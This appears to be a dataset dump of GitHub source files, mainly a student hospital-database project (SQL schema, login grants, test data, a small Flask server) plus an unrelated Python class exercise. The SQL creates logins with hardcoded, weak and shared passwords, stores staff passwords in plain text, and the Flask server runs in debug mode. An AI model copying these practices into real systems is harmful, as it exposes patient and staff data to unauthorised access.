'vwx@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE8 WITH PASSWORD = 'xyz@12345',\nDEFAULT_DATABASE = hospital;\nCREATE LOGIN NURSE9 WITH PASSWORD = 'adc@12345',\nDEFAULT_DATABASE = hospital;\n\ncreate user NURSE0 for login NURSE0 with Default_Schema = dbo;\ncreate user NURSE1 for login NURSE1 with Default_Schema = dbo;\ncreate user NURSE2 for login NURSE2 with Default_Schema = dbo;\ncreate user NURSE3 for login NURSE3 with Default_Schema = dbo;\ncreate user NURSE4 for login NURSE4 with Default_Schema = dbo;\ncreate user NURSE5 for login NURSE5 with Default_Schema = dbo;\ncreate user NURSE6 for login NURSE6 with Default_Schema = dbo;\ncreate user NURSE7 for login NURSE7 with Default_Schema = dbo;\ncreate user NURSE8 for login NURSE8 with Default_Schema = dbo;\ncreate user NURSE9 for login NURSE9 with Default_Schema = dbo;\n\nGrant select on Health_Attribute to NURSE0,NURSE1,NURSE2,NURSE3,NURSE4,NURSE5,NURSE6,NURSE7,NURSE8,NURSE9;\n\n/*creating view on patient table*/\n/* If we want to grant part of information of patient table to Nurse.Then we can create a view on patient table and then it can be\nviewed by nurse*/\nselect * from patient;\nselect * from Nurse;\ncreate view patient_data AS\nselect Patient_ID,FirstName,LastName,Gender,Bed_ID\nfrom Patient\n\nselect * from patient_data;\n\ngrant select on patient_data to NURSE0,NURSE1,NURSE2,NURSE3,NURSE4,NURSE5,NURSE6,NURSE7,NURSE8,NURSE9;\n\n\n\n/* deleted not null for doctor_id and nurse_id as one of them only will be giving the medicine to patient */\ncreate table MedicineUseRecord(\n\tMUR_ID\t\t\t\tnvarchar(20) not null primary key,\n\tMedince_ID \t\t\tnvarchar(20) not null foreign key(Medince_ID) references Medicine(Medince_ID),\n\tDoctor_ID\t\t\tnvarchar(20) foreign key(Doctor_ID) references Doctor(Doctor_ID),\n\tNurse_ID \t\t\tnvarchar(20) foreign key(Nurse_ID) references Nurse(Nurse_ID),\n\tQuantity\t\t\tint not null check(Quantity > 0),--changed by aakruthi\n\tPatient_ID\t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tUsedDate\t\t\tdate not null\n);\ninsert MedicineUseRecord\nvalues (1,1,1,null,5,1,'2016/01/01'),\n(2,2,null,2,5,2,'2016/01/02'),\n(3,3,3,null,5,3,'2016/01/03'),\n(4,4,null,4,5,4,'2016/01/04'),\n(5,5,null,5,5,5,'2016/01/05'),\n(6,6,6,null,5,6,'2016/01/06'),\n(7,7,7,null,5,7,'2016/01/07'),\n(8,8,null,8,5,8,'2016/01/08'),\n(9,9,null,9,5,9,'2016/01/09'),\n(10,0,8,null,5,0,'2016/01/10');\n\n/* Given identity property to bill_id so the id gets auto generated and inserted values accordingly and in bill_detail\nchanged the bill_id to int */\ncreate table Bill(\n\tBill_ID\t\t\t\tint identity(1,1) not null primary key,\n\tPatient_ID \t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tBillTotal \t\t\tmoney,\n\tPaymentTotal\t\t\tmoney,\n\tInsuranceTotal\t\t\tmoney,\n\tPaymentDate\t\t\tdate\n);\ninsert Bill values\n(1,344,234,234,'2014/02/01'),\n(2,345,200,200,'2014/02/01'),\n(3,345,200,200,'2014/02/01'),\n(4,765,500,500,'2016/04/11'),\n(5,345,300,300,'2015/03/02'),\n(6,345,300,300,'2016/04/17'),\n(7,345,300,300,'2015/02/02'),\n(8,345,300,300,'2016/01/01'),\n(9,345,300,300,'2016/01/11');\n\n\ncreate table Bill_Detail(\n\tBillDetail_ID\t\tnvarchar(20) not null primary key,\n\tBill_ID \t\t\tint not null foreign key(Bill_ID) references Bill(Bill_ID),\n\tMedince_ID\t\t\tnvarchar(20) foreign key(Medince_ID) references Medicine(Medince_ID),/*changed by aakruthi.removed not null*/\n\tType\t\t\t\tnvarchar(20),\n\tTotal \t\t\t\tmoney,\n\tDate \t\t\t\tdate\n);\n\n\n \n\n \n\n"
},
{
"alpha_fraction": 0.650943398475647,
"alphanum_fraction": 0.650943398475647,
"avg_line_length": 18.363636016845703,
"blob_id": "e1533a9cb21e2eef7a5407d2346afa60fb283efa",
"content_id": "ac49405a46fcf0b92c5b864bf5c6cb59837300e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 11,
"path": "/Front-End/final/webserver.py",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "from flask import Flask,render_template\n\napp = Flask(__name__)\n\[email protected]('/index')\ndef index():\n\tpost = \"index\"\n\treturn render_template('index.html',post = post)\n\nif __name__ == '__main__':\n\tapp.run(debug=True)"
},
{
"alpha_fraction": 0.6938396692276001,
"alphanum_fraction": 0.7221940755844116,
"avg_line_length": 35.574073791503906,
"blob_id": "e7f8d5446f0b58fac562b5f178f2bf3da6427895",
"content_id": "8523ee18a6da66ac07ac974edfe356112ac0bdfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 5925,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 162,
"path": "/Hospital.sql",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "--author:XD\n--Date: 03/26/2016\ncreate database Hospital\n\nuse Hospital;\n\ncreate table Supplier(\n\tSupplier_ID\t\t\tnvarchar(20) not null primary key,\n\tSupplier_Name\t\tnvarchar(30) not null,\n\tContactFirstName\tnvarchar(30) not null,\n\tContactLastName\t\tnvarchar(30) not null,\n\tPhone\t\t\t\tnvarchar(15) not null,\n\tEmail\t\t\t\tnvarchar(20) not null,\n\tAddress\t\t\t\tnvarchar(20) not null,\n\tCity\t\t\t\tnvarchar(15) not null,\n\tState\t\t\t\tnvarchar(10) not null\n);\n\n\ncreate table Medicine(\n\tMedince_ID \t\t\tnvarchar(20) not null primary key,\n\tName \t\t\t\tnvarchar(50) not null,\n\tSupplier_ID \t\tnvarchar(20) not null foreign key(Supplier_ID) references Supplier(Supplier_ID),\n\tUnitPrice \t\t\tmoney not null check(UnitPrice >= 0), --changed by aakruthi \n\tAvailableQuantity\tint not null,--changed by aakruthi\n\tDescription \t\ttext\n);\n\ncreate table Department(\n\tDepartmentID\t\tnvarchar(20) not null primary key,--changed by aakruthi\n\tName \t\t\t\tnvarchar(50) not null\n);\n\n\ncreate table Insurance(\n\tInsurance_ID \t\tnvarchar(20) not null primary key,\n\tName \t\t\t\tnvarchar(50) not null,\n\tTotal \t\t\t\tmoney not null check(Total > 0),\n\tDate \t\t\t\tdate not null,\n\tDescription \t\ttext\n);\n\ncreate table Bed(\n\tBed_ID \t\t\t\tnvarchar(20) not null primary key,\n\tBuilding \t\t\tnvarchar(50) not null,\n\tFloor \t\t\t\tint not null,\n\tUsed \t\t\t\tbit\n);\n\ncreate table Doctor(\n\tDoctor_ID\t\t\tnvarchar(20) not null primary key,\n\tFirstName \t\t\tnvarchar(30) not null,\n\tLastName \t\t\tnvarchar(30) not null,\n\tTitle\t\t\t\tnvarchar(20) not null,\n\tAge\t\t\t\t\tint not null check(Age >= 0),\n\tGender\t\t\t\tchar(1) not null check(Gender = 'F' or Gender = 'M'),\n\tDepartmentID\t\tnvarchar(20) not null foreign key(DepartmentID) references Department(DepartmentID),--changed by aakruthi\n\tPhone \t\t\t\tnvarchar(15) not null,\n\tEmail\t\t\t\tnvarchar(20) not null,\n\tReportToID \t\t\tnvarchar(20), --changed by aakruthi\n\tpassword\t\t\tnvarchar(256) not null\n);\n\ncreate table Nurse(\n\tNurse_ID\t\t\tnvarchar(20) not null primary key,\n\tFirstName \t\t\tnvarchar(30) not null,\n\tLastName \t\t\tnvarchar(30) not null,\n\tTitle\t\t\t\tnvarchar(20) not null,\n\tAge\t\t\t\t\tint not null check(Age >= 0),\n\tGender\t\t\t\tchar(1) not null check(Gender = 'F' or Gender = 'M'),\n\tDepartmentID\t\tnvarchar(20) not null foreign key(DepartmentID) references Department(DepartmentID),--changed by aakruthi\n\tPhone \t\t\t\tnvarchar(15) not null,\n\tEmail\t\t\t\tnvarchar(20) not null,\n\tReportToID\t\t\tnvarchar(20), --changed by aakruthi\n\tpassword\t\t\tnvarchar(256) not null\n);\n\n\ncreate table Patient(\n\tPatient_ID\t\t\tnvarchar(20) not null primary key,\n\tFirstName \t\t\tnvarchar(30) not null,\n\tLastName \t\t\tnvarchar(30) not null,\n\tGender\t\t\t\tchar(1) not null check(Gender = 'F' or Gender = 'M'),\n\tAge\t\t\t\t\tint not null check(Age >= 0),\n\tStatues\t\t\t\tchar(3) not null check(Statues = 'I' or Statues = 'II' or Statues = 'III' or Statues = 'IV'),\n\tPhone\t\t\t\tnvarchar(15) not null,\n\tEmail \t\t\t\tnvarchar(20) not null,\n\tDepartmentID\t\tnvarchar(20) not null foreign key(DepartmentID) references Department(DepartmentID),--changed by aakruthi\n\tBed_ID\t\t\t\tnvarchar(20) not null foreign key(Bed_ID) references Bed(Bed_ID),\n\tInsurance_ID\t\tnvarchar(20) not null foreign key(Insurance_ID) references Insurance(Insurance_ID)\n);\n\ncreate table Bill(\n\tBill_ID\t\t\t\tnvarchar(20) not null primary key,\n\tPatient_ID \t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tBillTotal \t\t\tmoney,\n\tPaymentTotal\t\tmoney,\n\tInsuranceTotal\t\tmoney,\n\tPaymentDate\t\t\tdate\n);\n\ncreate table Bill_Detail(\n\tBillDetail_ID\t\tnvarchar(20) not null primary key,\n\tBill_ID \t\t\tnvarchar(20) not null foreign key(Bill_ID) references Bill(Bill_ID),\n\tMedince_ID\t\t\tnvarchar(20) not null foreign key(Medince_ID) references Medicine(Medince_ID),\n\tType\t\t\t\tnvarchar(20),\n\tTotal \t\t\t\tmoney,\n\tDate \t\t\t\tdate\n);\n\ncreate table Contract(\n\tContract_ID\t\t\tnvarchar(20) not null primary key,\n\tSupplier_ID\t\t\tnvarchar(20) not null foreign key(Supplier_ID) references Supplier(Supplier_ID),\n\tMedince_ID\t\t\tnvarchar(20) not null foreign key(Medince_ID) references Medicine(Medince_ID),\n\tQuantity\t\t\tint not null check(Quantity > 0),--changed by aakruthi\n\tUnitPrice\t\t money not null check(UnitPrice >= 0),--changed by aakruthi\n\tInvoice\t\t\t\tas (UnitPrice*Quantity),--changed by aakruthi\n\tDate\t\t\t datetime not null default getdate(),--changed by aakruthi\n\tArriveDate\t\t\tdatetime\n);\n\ncreate table TreatmentTeam(\n\tPatient_ID\t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tDoctor_ID\t\t\tnvarchar(20) not null foreign key(Doctor_ID) references Doctor(Doctor_ID)\n);\n\ncreate table MedicineUseRecord(\n\tMUR_ID\t\t\t\tnvarchar(20) not null primary key,\n\tMedince_ID \t\t\tnvarchar(20) not null foreign key(Medince_ID) references Medicine(Medince_ID),\n\tDoctor_ID\t\t\tnvarchar(20) not null foreign key(Doctor_ID) references Doctor(Doctor_ID),\n\tNurse_ID \t\t\tnvarchar(20) not null foreign key(Nurse_ID) references Nurse(Nurse_ID),\n\tQuantity\t\t\tint not null check(Quantity > 0),--changed by aakruthi\n\tPatient_ID\t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tUsedDate\t\t\tdatetime not null default getdate()\n);\n\n\ncreate table Health_Attribute(\n\tHealth_ID \t\t\tnvarchar(20) not null primary key,\n\tPatient_ID \t\t\tnvarchar(20) not null foreign key(Patient_ID) references Patient(Patient_ID),\n\tSystolic_BP \t\tnvarchar(30) not null,\n\tDiastolic_BP \t\tnvarchar(30) not null,\n\tBloodSugar \t\t\tnvarchar(30) not null,\n\tPulse \t\t\t\tnvarchar(30) not null,\n\tDate \t\t\t\tdatetime not null default getdate()\n);\n\ncreate table Register(\n\tRegister_ID \t\tnvarchar(20) not null primary key,\n\tFirstName \t\t\tnvarchar(50) not null,\n\tLastName \t\t\tnvarchar(50) not null,\n\tDoctor_ID \t\t\tnvarchar(20) not null foreign key(Doctor_ID) references Doctor(Doctor_ID),\n\tDate \t\t\t\tdate not null \n);\n\ncreate table NurseSchedule(\n\tSchedule_ID \t\tnvarchar(20) not null primary key,\n\tNurse_ID \t\t\tnvarchar(20) not null foreign key(Nurse_ID) references Nurse(Nurse_ID),\n\tStartTime\t\t\tdatetime not null,\n\tEndTime \t\t\tdatetime not null,\n\tBed_ID \t\t\t\tnvarchar(20) foreign key(Bed_ID) references Bed(Bed_ID)\n);\n"
},
{
"alpha_fraction": 0.7005887031555176,
"alphanum_fraction": 0.7005887031555176,
"avg_line_length": 13.355262756347656,
"blob_id": "498dde93f3dd16527b5009c48ec76fc3b185fe4e",
"content_id": "fdb5ec37de075d0a2b36abbb2419a9e95775a35b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1189,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 76,
"path": "/DCL.sql",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "CREATE LOGIN Doctor\r\n\tWITH PASSWORD = 'Inovator',\r\n\tDEFAULT_DATABASE = Hospital ;\r\n\r\nCREATE LOGIN Nurse\r\n\tWITH PASSWORD = 'Inovator',\r\n\tDEFAULT_DATABASE = Hospital;\r\n\r\nCREATE LOGIN Manager\r\n\tWITH PASSWORD = 'Inovator',\r\n\tDEFAULT_DATABASE = Hospital;\r\n\r\n\r\nUSE Hospital;\r\n\r\nCREATE USER Doctor\r\nFor Login Doctor;\r\n\r\nCREATE USER Nurse\r\nFor Login Nurse;\r\n\r\nCREATE USER Manager\r\nFor Login Manager;\r\n\r\n\r\n\r\nCREATE ROLE Doctor;\r\nCREATE ROLE Nurse;\r\n\r\n\r\n\r\n\r\n-- Grant permission to doctor\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON Doctor \r\nTO DOCTOR;\r\n\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON MedicineUseRecord \r\nTO DOCTOR;\r\n\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON TreatmentTeam \r\nTO DOCTOR;\r\n\r\nGRANT SELECT\r\nON Health_Attribute\r\nTO DOCTOR;\r\n\r\nGRANT SELECT, DELETE\r\nON Register\r\nTO Doctor;\r\n\r\n-- Grant permissions for Nurse\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON NurseSchedule\r\nTO Nurse;\r\n\r\nGRANT SELECT, UPDATE\r\nON MedicineUseRecord\r\nTO Nurse;\r\n\r\n\r\nGRANT SELECT, UPDATE, INSERT, DELETE\r\nON Nurse\r\nTO Nurse;\r\n\r\n-- Add members to roles\r\nALTER ROLE Doctor\r\nADD MEMBER DOCTOR;\r\n\r\nALTER ROLE Nurse\r\nADD MEMBER NURSE;\r\n\r\nALTER ROLE db_accessadmin\r\nADD MEMBER MANAGER;\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.3344064950942993,
"alphanum_fraction": 0.6012037992477417,
"avg_line_length": 35.243656158447266,
"blob_id": "f40425fa2540259ad670e617d5f01cedf2e68d34",
"content_id": "ac302db701e12bcdc4b029524bf998d5daa6d59b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 7144,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 197,
"path": "/insert.sql",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "--author = Aakruthi\nuse Hospital\n\ninsert Supplier values \n(0,'TEST0','TESTF0','TESTL0','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(1,'TEST1','TESTF1','TESTL1','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(2,'TEST2','TESTF2','TESTL2','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(3,'TEST3','TESTF3','TESTL3','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(4,'TEST4','TESTF4','TESTL4','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(5,'TEST5','TESTF5','TESTL5','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(6,'TEST6','TESTF6','TESTL6','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(7,'TEST7','TESTF7','TESTL7','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(8,'TEST8','TESTF8','TESTL8','123123123','[email protected]','TESTAddress','TESTCity','TESTState'),\n(9,'TEST9','TESTF9','TESTL9','123123123','[email protected]','TESTAddress','TESTCity','TESTState');\n\ninsert Medicine values\n(0,'TEST0',0,'12','120','TESTINFO'),\n(1,'TEST1',0,'12','120','TESTINFO'),\n(2,'TEST2',1,'12','120','TESTINFO'),\n(3,'TEST3',2,'12','120','TESTINFO'),\n(4,'TEST4',2,'12','120','TESTINFO'),\n(5,'TEST5',3,'12','120','TESTINFO'),\n(6,'TEST6',4,'12','120','TESTINFO'),\n(7,'TEST7',5,'12','120','TESTINFO'),\n(8,'TEST8',6,'12','120','TESTINFO'),\n(9,'TEST9',6,'12','120','TESTINFO');\n\ninsert Department values\n(0,'TEST0'),\n(1,'TEST1'),\n(2,'TEST2'),\n(3,'TEST3'),\n(4,'TEST4'),\n(5,'TEST5'),\n(6,'TEST6'),\n(7,'TEST7'),\n(8,'TEST8'),\n(9,'TEST9');\n\ninsert Insurance values\n(0,'TEST0',100,'2016/05/01','TESTINFO'),\n(1,'TEST1',200,'2016/05/02','TESTINFO'),\n(2,'TEST2',300,'2016/05/03','TESTINFO'),\n(3,'TEST3',400,'2016/05/03','TESTINFO'),\n(4,'TEST4',500,'2016/05/04','TESTINFO'),\n(5,'TEST5',600,'2016/05/05','TESTINFO'),\n(6,'TEST4',500,'2016/05/04','TESTINFO'),\n(7,'TEST4',500,'2016/05/04','TESTINFO'),\n(8,'TEST4',500,'2016/05/04','TESTINFO'),\n(9,'TEST4',500,'2016/05/04','TESTINFO');\n\ninsert Bed values\n(0,'1',2,1),\n(1,'1',1,0),\n(2,'2',1,0),\n(3,'2',3,1),\n(4,'3',4,1),\n(5,'2',3,1),\n(6,'2',3,1),\n(7,'2',3,1),\n(8,'2',3,1),\n(9,'2',3,1);\n\ninsert Doctor values\n(0,'TESTF0','TESTL0','Doc',30,'M',0,'123123123','TEST0@test',null,'testPas'),\n(1,'TESTF1','TESTL1','Doc',31,'F',0,'123123123','TEST0@test',0,'testPas'),\n(2,'TESTF2','TESTL2','Doc',31,'M',1,'123123123','TEST0@test',null,'testPas'),\n(3,'TESTF3','TESTL3','Doc',34,'F',1,'123123123','TEST0@test',2,'testPas'),\n(4,'TESTF4','TESTL4','Doc',34,'M',1,'123123123','TEST0@test',2,'testPas'),\n(5,'TESTF5','TESTL5','Doc',36,'M',2,'123123123','TEST0@test',null,'testPas'),\n(6,'TESTF6','TESTL6','Doc',37,'F',2,'123123123','TEST0@test',5,'testPas'),\n(7,'TESTF7','TESTL7','Doc',41,'F',1,'123123123','TEST0@test',null,'testPas'),\n(8,'TESTF8','TESTL8','Doc',29,'M',3,'123123123','TEST0@test',null,'testPas'),\n(9,'TESTF9','TESTL8','Doc',31,'M',4,'123123123','TEST0@test',null,'testPas');\n\ninsert Nurse values\n(0,'TESTF0','TESTL0','MISS',30,'M',0,'123123123','TEST0@test',null,'testPas'),\n(1,'TESTF1','TESTL1','MISS',31,'F',0,'123123123','TEST0@test',0,'testPas'),\n(2,'TESTF2','TESTL2','MISS',31,'M',1,'123123123','TEST0@test',null,'testPas'),\n(3,'TESTF3','TESTL3','MISS',34,'F',1,'123123123','TEST0@test',2,'testPas'),\n(4,'TESTF4','TESTL4','MISS',34,'M',1,'123123123','TEST0@test',2,'testPas'),\n(5,'TESTF5','TESTL5','MISS',36,'M',2,'123123123','TEST0@test',null,'testPas'),\n(6,'TESTF6','TESTL6','MISS',37,'F',2,'123123123','TEST0@test',5,'testPas'),\n(7,'TESTF7','TESTL7','MISS',41,'F',1,'123123123','TEST0@test',null,'testPas'),\n(8,'TESTF8','TESTL8','MISS',29,'M',3,'123123123','TEST0@test',null,'testPas'),\n(9,'TESTF9','TESTL9','MISS',31,'M',4,'123123123','TEST0@test',null,'testPas');\n\ninsert Patient values\n(0,'TESTF0','TESTL0','M',20,'I','123123123','TEST@test',0,0,0),\n(1,'TESTF1','TESTL1','F',89,'II','123123123','TEST@test',1,1,1),\n(2,'TESTF2','TESTL2','F',34,'III','123123123','TEST@test',1,2,2),\n(3,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(4,'TESTF4','TESTL4','M',26,'IV','123123123','TEST@test',3,4,4),\n(5,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(6,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(7,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(8,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3),\n(9,'TESTF3','TESTL3','M',45,'I','123123123','TEST@test',2,3,3);\n\ninsert Bill values\n(0,0,0,0,0,null),\n(1,1,344,234,0,null),\n(2,2,345,100,0,null),\n(3,3,345,22,0,null),\n(4,4,7657,0,0,'2016/04/11'),\n(5,5,345,22,0,'2015/03/02'),\n(6,6,345,22,0,'2016/04/17'),\n(7,7,345,22,0,'2015/02/02'),\n(8,8,345,22,0,'2016/01/01'),\n(9,9,345,22,0,'2016/01/11');\n\ninsert Bill_Detail values\n(0,1,1,'Medicine',100,'2015/12/12'),\n(1,1,null,'Room',100,'2016/01/13'),\n(1,1,null,'Doc',100,'2016/02/10'),\n(2,2,null,'Doc',100,'2015/12/12'),\n(3,2,1,'Medicine',100,'2016/01/12'),\n(4,3,1,'Medicine',100,'2016/03/20'),\n(5,3,1,'Medicine',100,'2015/12/12'),\n(6,3,1,'Medicine',100,'2016/02/12'),\n(7,4,1,'Medicine',100,'2016/03/12'),\n(8,1,1,'Medicine',100,'2016/04/12'),\n(9,4,1,'Medicine',100,'2016/03/12');\n\ninsert into contract(Contract_ID,Supplier_ID,Medince_ID,Quantity,UnitPrice,Date)\nvalues (1,1,1,5,2,'2016/01/01'),\n(2,1,2,5,3,'2016/02/13'),\n(3,1,3,5,4,'2016/03/13'),\n(4,1,4,5,5,'2016/04/13'),\n(5,1,5,5,6,'2015/05/13'),\n(6,1,6,5,1,'2016/06/13'),\n(7,1,7,5,2,'2015/07/13'),\n(8,1,8,5,3,'2015/08/13'),\n(9,1,9,5,4,'2015/01/13'),\n(10,1,1,5,5,'2015/01/13');\n\ninsert into TreatmentTeam(Patient_ID,Doctor_ID)\nvalues (1,1),\n(2,2),\n(2,3),\n(3,4),\n(4,5),\n(5,6),\n(6,7),\n(7,8),\n(8,9),\n(1,10);\n\ninsert into MedicineUseRecord(MUR_ID,Medince_ID,Doctor_ID,Nurse_ID,Quantity,Patient_ID,UsedDate)\nvalues (1,1,1,1,5,1,'2016/01/01'),\n(2,2,2,2,5,2,'2016/01/02'),\n(3,3,3,3,5,3,'2016/01/03'),\n(4,4,4,4,5,4,'2016/01/04'),\n(5,5,5,5,5,5,'2016/01/05'),\n(6,6,6,6,5,6,'2016/01/06'),\n(7,7,7,7,5,7,'2016/01/07'),\n(8,8,8,8,5,8,'2016/01/08'),\n(9,9,9,9,5,9,'2016/01/09'),\n(10,10,10,10,5,10,'2016/01/10');\n\ninsert into Health_Attribute(Health_ID,Patient_ID,Systolic_BP,Diastolic_BP,BloodSugar,Pulse,Date)\nvalues (1,2,70,70,80,60,'2016-01-01'),\n(2,3,100,70,80,60,'2016-02-01'),\n(3,4,120,70,80,60,'2016-03-01'),\n(4,5,150,70,80,60,'2016-04-01'),\n(5,6,80,70,80,100,'2016-05-01'),\n(6,7,90,70,80,60,'2016-06-01'),\n(7,8,100,80,80,60,'2016-07-01'),\n(8,9,110,70,80,70,'2016-08-01'),\n(9,10,150,90,80,80,'2016-09-01'),\n(10,1,80,100,80,90,'2016-10-01');\n\n\n\ninsert into register(Register_ID,Name,Doctor_ID,Date)\nvalues (1,'xyz','defss',1,'2016-01-01'),\n(2,'ABC','test',2,'2016-01-02'),\n(3,'DEF','ESA',3,'2016-01-03'),\n(4,'GHI','TER',4,'2016-01-04'),\n(5,'JKL','QWE',5,'2016-01-05'),\n(6,'MNO','SQW',6,'2015-01-01'),\n(7,'PQR','ASX',7,'2015-01-02'),\n(8,'STU','QWQ',8,'2015-01-03'),\n(9,'VWX','sdf',9,'2015-01-04'),\n(10,'ADA','tests',2,'2015-01-05');\n\ninsert into NurseSchedule(Schedule_ID,Nurse_ID,StartTime,EndTime,Bed_ID)\nvalues (1,1,'6:00:00','15:00:00',1),\n(2,2,'6:00:00','15:00:00',1),\n(3,3,'6:00:00','15:00:00',1),\n(4,4,'6:00:00','15:00:00',1),\n(5,5,'6:00:00','15:00:00',1),\n(6,1,'15:00:00','21:00:00',1),\n(7,2,'6:00:00','21:00:00',1),\n(8,3,'21:00:00','6:00:00',1),\n(9,4,'21:00:00','6:00:00',1),\n(10,5,'21:00:00','6:00:00',1);\n\n\n\n\n"
}
] | 6 |
NastyHub/classtest
|
https://github.com/NastyHub/classtest
|
959fc5c1e183ce55899bea311c74e69fa3344057
|
89e0c7ae92fcd30bd1babb69fe7b9cf97fbb719b
|
9fac8bd883cca71b8df4ec46f9bdd2651d7069ca
|
refs/heads/master
| 2023-01-11T04:38:12.585878 | 2020-11-17T11:24:14 | 2020-11-17T11:24:14 | 293,013,964 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.567206859588623,
"alphanum_fraction": 0.5729265809059143,
"avg_line_length": 22.395349502563477,
"blob_id": "63e27067e4e8f70fddbc492429e414c72db762cb",
"content_id": "af10c5e14018ea8b62a687cb153235870a3319d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1163,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 43,
"path": "/test.py",
"repo_name": "NastyHub/classtest",
"src_encoding": "UTF-8",
"text": "\r\n#edit test\r\n#class 테스트\r\n\r\nclass character():\r\n \r\n #init은 class가 생성될때마다 등장합니다\r\n def __init__(self, name = \"No\", health = 100, money = 100):\r\n self.name = name\r\n self.money = money\r\n self.health = health\r\n print(f\"{self.name} spawned with ${self.money}\")\r\n\r\n def checkmoney(self):\r\n return self.money\r\n\r\n def checkhealth(self):\r\n return self.health\r\n\r\n def __del__(self):\r\n print(f\"{self.name}이 사망하였습니다\")\r\n\r\nprint(\"Character Spawn Module\")\r\n\r\nnameofplr = input(\"스폰하고싶은 캐릭터 이름?: \")\r\n\r\nplayer = character(nameofplr)\r\n\r\nwhile True:\r\n question = input(\"하고싶은활동\\n모르겠으면 'help'을 입력해주세요\\n:\")\r\n\r\n if question.lower() == \"help\":\r\n print(\"checkmoney, checkhealth, suicide\")\r\n continue\r\n elif question.lower() == \"checkmoney\":\r\n print(player.checkmoney())\r\n continue\r\n elif question.lower() == \"checkhealth\":\r\n print(player.checkhealth())\r\n continue\r\n elif question.lower() == \"suicide\":\r\n del player\r\n break\r\nprint(\"게임 오버\")"
},
{
"alpha_fraction": 0.7846153974533081,
"alphanum_fraction": 0.7846153974533081,
"avg_line_length": 31.5,
"blob_id": "265f996f34ebd41919e457e51002acd01e8c3822",
"content_id": "a8f0cf83e19d57e646948ed875daef7845a00e1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 4,
"path": "/README.md",
"repo_name": "NastyHub/classtest",
"src_encoding": "UTF-8",
"text": "# classtest\n클래스 테스트\n\nI'm currently working with Discord.py and decided to write these down for the sake of my python experience..\n"
}
] | 2 |
scarlettliu644/DLT
|
https://github.com/scarlettliu644/DLT
|
59adf19906b282bcf6d0c2f8a9323c2c2068daf7
|
2c0b634b171a53152fc1be93fb50833020510e8a
|
8c01c21f935ee99a5eb4e0bd88847f29e01b5ed4
|
refs/heads/master
| 2022-04-22T18:42:37.206255 | 2020-04-26T19:10:56 | 2020-04-26T19:10:56 | 438,851,512 | 1 | 0 | null | 2021-12-16T03:45:51 | 2021-09-16T09:25:27 | 2020-04-26T19:11:14 | null |
[
{
"alpha_fraction": 0.7610062956809998,
"alphanum_fraction": 0.7735849022865295,
"avg_line_length": 25.5,
"blob_id": "e5ae57316f63e61639258db49518b212f921e80e",
"content_id": "7ac19b600256c4f9224a8b3aeee0eff17cfd10ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 12,
"path": "/README.md",
"repo_name": "scarlettliu644/DLT",
"src_encoding": "UTF-8",
"text": "# DLT\nA simple python implementation of the normalized DLT algorithm: It follows the steps in algorothm 4.2 from Zisserman Multiple View Geometry (2nd edition)\n\n## Run\n\n```\npython3 DLT.py\n```\n\n## Data\n\nThe boat folder contains two images (original and warped) together with their corresponding homography data points.\n"
},
{
"alpha_fraction": 0.5898836255073547,
"alphanum_fraction": 0.6103063225746155,
"avg_line_length": 27.26174545288086,
"blob_id": "5ed4a3bebfee4b6105d7266e1528452759897d34",
"content_id": "7232a4317db992d8f943de8612c4501de3a9b2ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4211,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 149,
"path": "/DLT.py",
"repo_name": "scarlettliu644/DLT",
"src_encoding": "UTF-8",
